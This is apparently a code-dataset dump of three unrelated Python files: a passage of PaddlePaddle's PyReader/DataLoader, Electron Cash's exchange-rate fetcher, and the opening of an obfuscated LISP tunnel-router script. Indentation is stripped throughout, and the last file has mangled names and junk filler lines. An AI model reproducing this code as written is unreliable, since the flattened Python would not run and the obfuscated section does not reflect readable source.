shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__():
try:
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warn('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(target=__thread_main__)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be ommited when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled with
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
exchange_rate.py | from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electron Cash'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electron-Cash'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
except:
h = None
else:
h = None
timestamp = False
if h:
self.history[ccy] = h
self.on_history()
return h, timestamp
def get_historical_rates_safe(self, ccy, cache_dir):
h, timestamp = self.read_historical_rates(ccy, cache_dir)
if h is None or time.time() - timestamp < 24*3600:
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
self.on_history()
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
result = self.history.get(ccy)
if not result and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BCH", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BCH%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BCCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates/BCH')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker/?book=bch_btc')
return {'BTC': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json_usd = self.get_json('www.bitstamp.net', '/api/v2/ticker/bchusd')
json_eur = self.get_json('www.bitstamp.net', '/api/v2/ticker/bcheur')
json_btc = self.get_json('www.bitstamp.net', '/api/v2/ticker/bchbtc')
return {
'USD': Decimal(json_usd['last']),
'EUR': Decimal(json_eur['last']),
'BTC': Decimal(json_btc['last'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('coinbase.com',
'/api/v1/currencies/exchange_rates')
return dict([(r[7:].upper(), Decimal(json[r]))
for r in json if r.startswith('bch_to_')])
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
pairs = ['BCH%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class CoinFloor(ExchangeBase):
# CoinFloor API only supports GBP on public API
def get_rates(self, ccy):
json = self.get_json('webapi.coinfloor.co.uk:8090/bist/BCH/GBP', '/ticker/')
return {'GBP': Decimal(json['last'])}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/bch_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/bch_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/bch_usd')
json_btc = self.get_json('wex.nz', '/api/3/ticker/bch_btc')
json_ltc = self.get_json('wex.nz', '/api/3/ticker/bch_ltc')
json_eth = self.get_json('wex.nz', '/api/3/ticker/bch_eth')
json_dsh = self.get_json('wex.nz', '/api/3/ticker/bch_dsh')
return {'EUR': Decimal(json_eur['bch_eur']['last']),
'RUB': Decimal(json_rub['bch_rur']['last']),
'USD': Decimal(json_usd['bch_usd']['last']),
'BTC': Decimal(json_btc['bch_btc']['last']),
'LTC': Decimal(json_ltc['bch_ltc']['last']),
'ETH': Decimal(json_eth['bch_eth']['last']),
'DSH': Decimal(json_dsh['bch_dsh']['last'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas,default_prec = 2):
prec = CCY_PRECISIONS.get(self.ccy, default_prec)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'Kraken')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Kraken)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return Decimal(rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
default_prec = 2
if (base_unit == "cash"):
default_prec = 4
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate, default_prec ), self.ccy )
def value_str(self, satoshis, rate, default_prec = 2 ):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = Decimal(satoshis) / COIN * Decimal(rate)
return "%s" % (self.ccy_amount_str(value, True, default_prec))
return _("No data")
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return Decimal(rate) if rate is not None else None
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
def historical_value(self, satoshis, d_t):
rate = self.history_rate(d_t)
if rate:
return Decimal(satoshis) / COIN * Decimal(rate)
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
lisp-itr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import select
import threading
import pcappy
import time
import os
import commands
import struct
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = None
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )
OOo = lisp . lisp_get_ephemeral_port ( )
Ii1IIii11 = None
Oooo0000 = None
i11 = None
I11 = None
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
oo0O000OoO = False
if 34 - 34: I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
i1iIIi1 = threading . Lock ( )
if 50 - 50: i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
def IIiiIiI1 ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "ITR" , [ ] ) )
if 41 - 41: OoOoOO00
